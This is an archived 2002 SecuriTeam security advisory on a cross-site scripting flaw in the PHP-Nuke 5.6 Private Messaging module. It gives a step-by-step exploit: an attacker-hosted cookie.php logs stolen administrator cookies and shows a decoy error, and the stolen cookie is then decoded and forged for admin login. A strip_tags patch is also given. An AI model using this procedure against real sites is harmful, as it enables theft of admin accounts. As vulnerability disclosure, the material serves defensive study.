[UNIX] PHPNuke Private Messaging Module Allows Compromising of Administrator AccountsFrom: email@example.com
- Previous message: firstname.lastname@example.org: "[NT] Apache Web Server Directory Traversal and Path Disclosure Vulnerability (non UNIX)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: email@example.com To: firstname.lastname@example.org Date: Sun, 18 Aug 2002 14:29:08 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
PHPNuke Private Messaging Module Allows Compromising of Administrator
A vulnerability in PHPNuke's Private Messaging module allows remote
attackers to steal the hashed cookie (containing the password of the
administrator) thus effectively gaining administrative access to the
* PHP-Nuke version 5.6
Due to a XSS flaw in PHPNuke's Private Messaging module, users can send a
message with malicious HTML code, the code will be executed without any
filtering upon opening of the message. The vulnerability has two versions,
in old PHPNuke versions the XSS allowed theft of cookies and effectively
the password stored in them (since the password was stored without any
protection, namely hashing of it). In newer versions of PHPNuke (version
5.6 and above), PHPNuke hashes the passwords with the MD5 algorithm,
prior to its encoding. This makes it is impossible to find the clear text
equivalent of the password from a hashed password.
PHPNuke stores cookies in the following form:
Since we can get the md5_encrypted pass all we need to do is launch a
script that base64 encodes a string like the one shown before.
Allows any user to get administrative access to a PHP-Nuke site.
For this exploit to work, you must create the following files in your web
cookie.php containing this:
$fp = fopen("cookie.txt","a");
print "Message Not Found!"; /* this is so the admin does not get scared.
and thinks its some bug. */
$admin = base64_encode("decoded_string") ;
To find out what to replace decoded_string with do the following:
1. Send an appealing private message to admin containing
2. Wait until the administrator checks the message then check cookie.txt
on your server.
3. From the cookie.txt file copy the encrypted text found after admin= and
before the ;
4. Go to http://www.isecurelabs.com/base64.php paste the copied text,
click decode it should give you a string of the form of:
(Note that the language may be blank).
5. Paste the decoded string into test.php like so:
$admin = base64_encode("paste decoded string here");
6. Login with a normal user to the site.
7. Send private message to yourself containing:
Open the message and a cookie will now be set on yer box, but it will be
configured with your server's URL. So all you need to replace your URL
with the site you are testing.
8. In the case of Mozilla edit cookies.txt in your
~/.mozilla/someprofile/something/ directory. Replace the URL of your
server to the tested site, for other browsers just find the Cookie from
your server and edit it so that instead of showing your URL it shows the
URL of the tested site.
9. Restart your browser, and then go back to the tested site. You should
now be an administrator.
Edit reply.php found in /modules/Private_Messages/ and make $message strip
dangerous HTML tags. This can be done by going to line 75 in reply.php and
adding this line:
$message = strip_tags($message, '<br><b><u><i>');
This line will remove any HTML tags that are not <br><b><u> or <i>.
Preventing any XSS from happening.
<-delusion-> was not able to contact the PHP Nuke support, further he
could not find an email on their site.
The information has been provided by <mailto:email@example.com>
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: firstname.lastname@example.org
In order to subscribe to the mailing list, simply forward this email to: email@example.com
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.